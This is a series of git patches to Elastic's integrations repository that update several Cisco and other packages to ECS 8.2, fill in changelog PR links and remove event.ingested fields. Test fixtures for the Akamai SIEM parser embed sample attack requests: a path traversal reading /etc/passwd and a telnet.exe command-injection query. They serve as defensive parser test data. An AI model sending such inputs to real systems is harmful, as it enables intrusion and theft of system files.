@@ -2678,7 +2678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2751,7 +2751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2837,7 +2837,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2926,7 +2926,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -2999,7 +2999,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3089,7 +3089,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3179,7 +3179,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3273,7 +3273,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3376,7 +3376,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Malicious Activity Detection", @@ -3477,7 +3477,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3564,7 +3564,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3651,7 +3651,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3738,7 +3738,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -3822,7 +3822,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -3894,7 +3894,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -3967,7 +3967,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", 
diff --git a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
index 64a86275937..cb8d2c4f94c 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml
@@ -40,7 +40,7 @@ processors:
 value: '{{_ingest.timestamp}}'
 - set:
 field: ecs.version
- value: '8.0.0'
+ value: '8.2.0'
 - set:
 field: event.kind
 value: alert
diff --git a/packages/cisco_secure_endpoint/data_stream/event/sample_event.json b/packages/cisco_secure_endpoint/data_stream/event/sample_event.json
index 6debb78f59e..384a7112253 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/sample_event.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/sample_event.json
@@ -50,7 +50,7 @@
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "584f3aea-648c-4e58-aba4-32b8f88d4396",
diff --git a/packages/cisco_secure_endpoint/docs/README.md b/packages/cisco_secure_endpoint/docs/README.md
index e9269fb0943..4c797e0ec33 100644
--- a/packages/cisco_secure_endpoint/docs/README.md
+++ b/packages/cisco_secure_endpoint/docs/README.md
@@ -66,7 +66,7 @@ An example event for `event` looks as following:
 "type": "logs"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "elastic_agent": {
 "id": "584f3aea-648c-4e58-aba4-32b8f88d4396",
diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml
index 0b3f9ccc5d1..e27db7430ae 100644
--- a/packages/cisco_secure_endpoint/manifest.yml
+++ b/packages/cisco_secure_endpoint/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_secure_endpoint
 title: Cisco Secure Endpoint (AMP)
-version: 2.0.0
+version: 2.1.0
 license: basic
 description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent.
 type: integration
From 821dcf444f912e3b81e7450ebf883722c7549bcf Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 23 Feb 2022 12:19:13 -0600 Subject: [PATCH 17/23] Update cisco_umbrella to ECS 8.2 --- packages/cisco_umbrella/_dev/build/build.yml | 2 +- packages/cisco_umbrella/changelog.yml | 5 +++++ .../test-umbrella-cloudfirewalllogs.log-expected.json | 4 ++-- .../test/pipeline/test-umbrella-dnslogs.log-expected.json | 6 +++--- .../test/pipeline/test-umbrella-iplogs.log-expected.json | 4 ++-- .../test/pipeline/test-umbrella-proxylogs.log-expected.json | 6 +++--- .../log/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/cisco_umbrella/data_stream/log/sample_event.json | 2 +- packages/cisco_umbrella/docs/README.md | 2 +- packages/cisco_umbrella/manifest.yml | 2 +- 10 files changed, 20 insertions(+), 15 deletions(-)
diff --git a/packages/cisco_umbrella/_dev/build/build.yml b/packages/cisco_umbrella/_dev/build/build.yml
index 809e76063e9..d61527283ec 100644
--- a/packages/cisco_umbrella/_dev/build/build.yml
+++ b/packages/cisco_umbrella/_dev/build/build.yml
@@ -1,3 +1,3 @@
 dependencies:
 ecs:
- reference: git@8.0
+ reference: git@8.2
diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml
index 9eacd76ca49..5e118a44841 100644
--- a/packages/cisco_umbrella/changelog.yml
+++ b/packages/cisco_umbrella/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.6.0"
+ changes:
+ - description: Update to ECS 8.2
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/xxxx
 - version: "0.5.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
index ab8910997db..f98cd40bf11 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json
@@ -26,7 +26,7 @@
 "ip": "67.43.156.12"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
@@ -98,7 +98,7 @@
 "ip": "67.43.156.12"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json
index 54d7fcc0de7..f723b31a025 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json
@@ -42,7 +42,7 @@
 "type": "query"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "dns-request-Allowed",
@@ -130,7 +130,7 @@
 "type": "query"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "dns-request-Blocked",
@@ -212,7 +212,7 @@
 "type": "query"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "action": "dns-request-Allowed",
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json
index 58961a7474f..86fccef0590 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json
@@ -25,7 +25,7 @@
 "port": 0
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
@@ -85,7 +85,7 @@
 "port": 445
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json
index ad31c46b2a9..83a2b73937e 100644
--- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json
+++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json
@@ -30,7 +30,7 @@
 "ip": "81.2.69.144"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
@@ -116,7 +116,7 @@
 "ip": "81.2.69.144"
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
@@ -182,7 +182,7 @@
 }
 },
 "ecs": {
- "version": "8.0.0"
+ "version": "8.2.0"
 },
 "event": {
 "category": "network",
diff --git a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index f0f84459906..3a637029907 100644
--- a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -8,7 +8,7 @@ processors:
 value: "{{_ingest.timestamp}}"
 - set:
 field: ecs.version
- value: "8.0.0"
+ value: "8.2.0"
 - set:
 field: observer.vendor
 value: Cisco
diff --git a/packages/cisco_umbrella/data_stream/log/sample_event.json b/packages/cisco_umbrella/data_stream/log/sample_event.json
index f35e1740395..f2356b0269f 100644
--- a/packages/cisco_umbrella/data_stream/log/sample_event.json
+++ b/packages/cisco_umbrella/data_stream/log/sample_event.json
@@ -42,7 +42,7 @@
 },
 "@timestamp": "2020-07-23T23:48:56.000Z",
 "ecs": {
- "version": "1.12.0"
+ "version": "8.2.0"
 },
 "related": {
 "hash": [
diff --git a/packages/cisco_umbrella/docs/README.md b/packages/cisco_umbrella/docs/README.md
index a8444ee2447..04bfae71d79 100644
--- a/packages/cisco_umbrella/docs/README.md
+++ b/packages/cisco_umbrella/docs/README.md
@@ -60,7 +60,7 @@ An example event for `log` looks as following:
 },
 "@timestamp": "2020-07-23T23:48:56.000Z",
 "ecs": {
- "version": "1.12.0"
+ "version": "8.2.0"
 },
 "related": {
 "hash": [
diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml
index fcb6c5b5d2d..7e7881e02f7 100644
--- a/packages/cisco_umbrella/manifest.yml
+++ b/packages/cisco_umbrella/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_umbrella
 title: Cisco Umbrella
-version: 0.5.0
+version: 0.6.0
 license: basic
 description: Collect logs from Cisco Umbrella with Elastic Agent.
 type: integration
From 05aa725f6c7a605672ba60acefc0cec1895bc11c Mon Sep 17 00:00:00 2001
From: Taylor Swanson Date: Mon, 7 Mar 2022 11:13:58 -0600 Subject: [PATCH 18/23] Update changelogs with PR number --- packages/1password/changelog.yml | 2 +- packages/akamai/changelog.yml | 2 +- packages/atlassian_bitbucket/changelog.yml | 2 +- packages/atlassian_confluence/changelog.yml | 2 +- packages/atlassian_jira/changelog.yml | 2 +- packages/auditd/changelog.yml | 2 +- packages/barracuda/changelog.yml | 2 +- packages/bluecoat/changelog.yml | 2 +- packages/carbonblack_edr/changelog.yml | 2 +- packages/cisco_asa/changelog.yml | 2 +- packages/cisco_duo/changelog.yml | 2 +- packages/cisco_ftd/changelog.yml | 2 +- packages/cisco_ios/changelog.yml | 2 +- packages/cisco_meraki/changelog.yml | 2 +- packages/cisco_nexus/changelog.yml | 2 +- packages/cisco_secure_endpoint/changelog.yml | 2 +- packages/cisco_umbrella/changelog.yml | 2 +- 17 files changed, 17 insertions(+), 17 deletions(-)
diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml
index 2592c7be889..8b50d364a70 100644
--- a/packages/1password/changelog.yml
+++ b/packages/1password/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.1.1"
 changes:
 - description: Fix field mapping conflict for ECS `event.created`.
diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml
index 0b8b4c9780c..10c81457de1 100644
--- a/packages/akamai/changelog.yml
+++ b/packages/akamai/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "0.1.1"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/atlassian_bitbucket/changelog.yml b/packages/atlassian_bitbucket/changelog.yml
index 9b97737b763..f5580b9a07c 100644
--- a/packages/atlassian_bitbucket/changelog.yml
+++ b/packages/atlassian_bitbucket/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/atlassian_confluence/changelog.yml b/packages/atlassian_confluence/changelog.yml
index f86bec1222c..12cccb68ab8 100644
--- a/packages/atlassian_confluence/changelog.yml
+++ b/packages/atlassian_confluence/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/atlassian_jira/changelog.yml b/packages/atlassian_jira/changelog.yml
index 3857866bdd8..3141c2957e8 100644
--- a/packages/atlassian_jira/changelog.yml
+++ b/packages/atlassian_jira/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/auditd/changelog.yml b/packages/auditd/changelog.yml
index ff57fd06688..91099eb4971 100644
--- a/packages/auditd/changelog.yml
+++ b/packages/auditd/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "2.1.0"
 changes:
 - description: Store EXECVE arguments in process.args array.
diff --git a/packages/barracuda/changelog.yml b/packages/barracuda/changelog.yml
index 4cf9fa88f2d..108d12d02cd 100644
--- a/packages/barracuda/changelog.yml
+++ b/packages/barracuda/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2.0
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "0.8.0"
 changes:
 - description: Update to ECS 8.0.0
diff --git a/packages/bluecoat/changelog.yml b/packages/bluecoat/changelog.yml
index 3f2ca444b74..5cffd4686b9 100644
--- a/packages/bluecoat/changelog.yml
+++ b/packages/bluecoat/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2.0
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "0.7.0"
 changes:
 - description: Update to ECS 8.0.0
diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml
index 3a67be50db0..d19cf28552d 100644
--- a/packages/carbonblack_edr/changelog.yml
+++ b/packages/carbonblack_edr/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/cisco_asa/changelog.yml b/packages/cisco_asa/changelog.yml
index 7be2c76dc7a..228e944e38a 100644
--- a/packages/cisco_asa/changelog.yml
+++ b/packages/cisco_asa/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "2.1.0"
 changes:
 - description: Add parsing for event code 113029-113040
diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml
index 92330f0dd24..b55048baaeb 100644
--- a/packages/cisco_duo/changelog.yml
+++ b/packages/cisco_duo/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.1.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml
index ac00c2d6a23..309caa03d8e 100644
--- a/packages/cisco_ftd/changelog.yml
+++ b/packages/cisco_ftd/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.1
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "2.0.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml
index d681432540a..663609c77c3 100644
--- a/packages/cisco_ios/changelog.yml
+++ b/packages/cisco_ios/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "1.4.1"
 changes:
 - description: Add missing event.original mapping
diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml
index 8460acf2706..ebc6f14dd12 100644
--- a/packages/cisco_meraki/changelog.yml
+++ b/packages/cisco_meraki/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2.0
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "0.4.0"
 changes:
 - description: Update to ECS 8.0.0
diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml
index c6ebd801fb9..71e6f86403d 100644
--- a/packages/cisco_nexus/changelog.yml
+++ b/packages/cisco_nexus/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2.0
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "0.4.0"
 changes:
 - description: Update to ECS 8.0.0
diff --git a/packages/cisco_secure_endpoint/changelog.yml b/packages/cisco_secure_endpoint/changelog.yml
index 10bad37dfed..5eced5f4d5c 100644
--- a/packages/cisco_secure_endpoint/changelog.yml
+++ b/packages/cisco_secure_endpoint/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "2.0.0"
 changes:
 - description: Update to ECS 8.0
diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml
index 5e118a44841..2dbcff11ed6 100644
--- a/packages/cisco_umbrella/changelog.yml
+++ b/packages/cisco_umbrella/changelog.yml
@@ -3,7 +3,7 @@
 changes:
 - description: Update to ECS 8.2
 type: enhancement
- link: https://github.com/elastic/integrations/pull/xxxx
+ link: https://github.com/elastic/integrations/pull/2778
 - version: "0.5.0"
 changes:
 - description: Update to ECS 8.0
From 974815100965d7cd6b647e533d68c1ab82f73455 Mon Sep 17 00:00:00 2001
From: Taylor Swanson Date: Wed, 16 Mar 2022 08:15:40 -0500 Subject: [PATCH 19/23] Remove event.ingested from packages --- .../pipeline/test-http-json.log-expected.json | 2 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-audit-api.log-expected.json | 177 ----------- .../test-audit-files.log-expected.json | 102 ------ .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-audit-api.log-expected.json | 182 ----------- .../test-audit-files.log-expected.json | 64 ---- .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-audit-api.log-expected.json | 98 ------ .../test-audit-files.log-expected.json | 88 ----- .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-events.json-expected.json | 99 ------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-admin.log-expected.json | 8 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../test/pipeline/test-auth.log-expected.json | 5 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../test-offline-enrollment.log-expected.json | 1 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-summary.log-expected.json | 2 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-telephony.log-expected.json | 3 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-asa-fix.log-expected.json | 5 - .../test/pipeline/test-asa.log-expected.json | 268 ---------------- .../test/pipeline/test-dns.log-expected.json | 21 -- .../pipeline/test-filtered.log-expected.json | 2 - ...est-firepower-management.log-expected.json | 34 -- 
.../pipeline/test-intrusion.log-expected.json | 4 - .../test-no-type-id.log-expected.json | 4 - .../pipeline/test-not-ip.log-expected.json | 3 - .../pipeline/test-sample.log-expected.json | 71 ----- ...test-security-connection.log-expected.json | 10 - ...st-security-file-malware.log-expected.json | 10 - ...st-security-malware-site.log-expected.json | 1 - .../elasticsearch/ingest_pipeline/default.yml | 3 - .../pipeline/test-generated.log-expected.json | 300 ------------------ .../elasticsearch/ingest_pipeline/default.yml | 4 - .../pipeline/test-nexus.log-expected.json | 3 - .../elasticsearch/ingest_pipeline/default.yml | 4 - .../test-cisco-amp1.log-expected.json | 49 --- .../test-cisco-amp2.log-expected.json | 42 --- .../test-cisco-amp3.log-expected.json | 45 --- .../test-cisco-amp4.log-expected.json | 100 ------ .../test-cisco-amp5.log-expected.json | 62 ---- .../test-cisco-amp6.log-expected.json | 53 ---- .../test-cisco-amp7.log-expected.json | 49 --- .../elasticsearch/ingest_pipeline/default.yml | 3 - ...brella-cloudfirewalllogs.log-expected.json | 2 - .../test-umbrella-dnslogs.log-expected.json | 3 - .../test-umbrella-iplogs.log-expected.json | 2 - .../test-umbrella-proxylogs.log-expected.json | 3 - .../elasticsearch/ingest_pipeline/default.yml | 4 - 59 files changed, 2938 deletions(-) diff --git a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json index 4f30451505a..3208aeab049 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json 
@@ -159,7 +159,6 @@ }, "event": { "start": "2017-04-04T10:57:02.000Z", - "ingested": "2021-12-23T23:43:19.592965333Z", "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R \",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml%0d%0aContent-Length%3a%20150\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "1158db1758e37bfe67b7c09", "category": 
"network", @@ -319,7 +318,6 @@ }, "event": { "start": "2016-08-11T13:45:33.026Z", - "ingested": "2021-12-23T23:43:19.592973640Z", "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"6724\",\"policyId\":\"scoe_5426\",\"ruleActions\":\"QUxFUlQ;REVOWQ==\",\"ruleData\":\"YWxlcnQo;Y3VybA==\",\"ruleMessages\":\"Q3Jvc3Mtc2l0ZSBTY3 JpcHRpbmcgKFhTUykgQXR0YWNr; UmVxdWVzdCBJbmRpY2F0ZXMgYW4 gYXV0b21hdGVkIHByb2 dyYW0gZXhwbG9yZWQgdGhlIHNpdGU=\",\"ruleSelectors\":\"QVJHUzph;UkVRVUVTVF9IRU FERVJTOlVzZXItQWdlbnQ=\",\"ruleTags\":\"V0VCX0FUVEFDSy9YU1M=;QV VUT01BVElPTi9NSVND\",\"ruleVersions\":\";\",\"rules\":\"OTUwMDA0;OTkwMDEx\"},\"geo\":{\"asn\":\"12271\",\"city\":\"NEWYORK\",\"continent\":\"NA\",\"country\":\"US\",\"regionCode\":\"NY\"},\"httpMessage\":{\"bytes\":\"34523\",\"host\":\"www.example.com\",\"method\":\"POST\",\"path\":\"/examples/1/\",\"port\":\"80\",\"protocol\":\"http/2\",\"query\":\"a%3D..%2F..%2F..%2Fetc%2Fpasswd\",\"requestHeaders\":\"User-Agent%3a%20BOT%2f0.1%20(BOT%20for%20JCE)%0d%0aAccept%3a%20text%2fhtml,application%2fxhtml+xml\",\"requestId\":\"2ab418ac8515f33\",\"responseHeaders\":\"Server%3a%20AkamaiGHost%0d%0aMime-Version%3a%201.0%0d%0aContent-Type%3a%20text%2fhtml\",\"start\":\"1470923133.026\",\"status\":\"301\",\"tls\": \"TLSv1.2\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"udfp:1325gdg4g4343g/M|unp:74256/H\",\"trust\":\"ugp:US\",\"general\":\"duc_1h:10|duc_1d:30\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", "id": "2ab418ac8515f33", "category": "network", 
diff --git a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml
index 8ad2b9f08da..004f5fcf3f4 100644
--- a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml
@@ -1,9 +1,6 @@
 ---
 description: Pipeline for parsing Akamai logs
 processors:
-- set:
- field: event.ingested
- value: '{{_ingest.timestamp}}'
 - set:
 field: ecs.version
 value: '8.2.0'
